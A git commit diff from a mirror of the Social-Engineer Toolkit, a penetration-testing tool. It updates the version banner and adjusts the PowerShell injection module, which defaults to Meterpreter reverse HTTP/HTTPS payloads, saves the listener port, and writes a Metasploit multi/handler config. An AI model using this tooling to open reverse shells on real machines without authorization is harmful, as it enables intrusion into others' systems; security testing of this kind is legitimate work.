mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-02-25 20:07:09 +00:00
Removed additional prompt within powershell alphanum generator
This commit is contained in:
parent
25062b5e0b
commit
c54123b364
3 changed files with 13 additions and 5 deletions
|
@ -223,7 +223,7 @@ def print_error(message):
|
||||||
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
|
||||||
|
|
||||||
def get_version():
|
def get_version():
|
||||||
define_version = '4.4.5'
|
define_version = '4.7'
|
||||||
return define_version
|
return define_version
|
||||||
|
|
||||||
class create_menu:
|
class create_menu:
|
||||||
|
@ -842,8 +842,8 @@ def show_banner(define_version,graphic):
|
||||||
print bcolors.BLUE + """
|
print bcolors.BLUE + """
|
||||||
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
|
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
|
||||||
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
|
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
|
||||||
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
|
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
|
||||||
[---] Codename: '""" + bcolors.YELLOW + """The Goat""" + bcolors.BLUE + """' [---]
|
[---] Codename: '""" + bcolors.YELLOW + """The Werewolf""" + bcolors.BLUE + """' [---]
|
||||||
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
|
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
|
||||||
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
|
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
|
||||||
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
|
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
|
||||||
|
|
|
@ -18,6 +18,7 @@ else:
|
||||||
powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
|
powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=")
|
||||||
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
||||||
|
|
||||||
|
# if we specified a hostname then default to reverse https/http
|
||||||
if validate_ip(ipaddr) == False:
|
if validate_ip(ipaddr) == False:
|
||||||
powershell_inject_x64 = "windows/meterpreter/reverse_https"
|
powershell_inject_x64 = "windows/meterpreter/reverse_https"
|
||||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||||
|
@ -36,16 +37,23 @@ if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepat
|
||||||
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
|
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
|
|
||||||
|
# check to see if the meta config multi pyinjector is there
|
||||||
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
|
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
|
||||||
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
|
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
|
||||||
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
|
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
|
||||||
port = fileopen.read()
|
port = fileopen.read()
|
||||||
|
|
||||||
|
# if port.options isnt there then prompt
|
||||||
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
|
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
|
||||||
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
|
||||||
if port == "": port = "443"
|
if port == "": port = "443"
|
||||||
|
# write out port.options for later use
|
||||||
|
filewrite = file("%s/src/program_junk/port.options" % (definepath), "w")
|
||||||
|
filewrite.write(port)
|
||||||
|
filewrite.close()
|
||||||
|
|
||||||
print_status("Generating x64-based powershell injection code...")
|
print_status("Generating x64-based powershell injection code...")
|
||||||
|
# define a base variable
|
||||||
x64 = ""
|
x64 = ""
|
||||||
x86 = ""
|
x86 = ""
|
||||||
|
|
||||||
|
|
|
@ -56,7 +56,7 @@ if powershell_menu_choice != "99":
|
||||||
|
|
||||||
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
|
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
|
||||||
if choice == 'NO':
|
if choice == 'NO':
|
||||||
pass #print_status("To create the listener for Metasploit, run msfconsole -r powershell.rc")
|
pass
|
||||||
# if we want to start the listener
|
# if we want to start the listener
|
||||||
if choice == 'YES':
|
if choice == 'YES':
|
||||||
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
|
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
|
||||||
|
|
Loading…
Add table
Reference in a new issue